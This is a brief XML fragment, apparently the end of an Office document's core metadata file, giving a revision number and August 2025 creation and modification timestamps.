  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-23T14:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-26T07:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>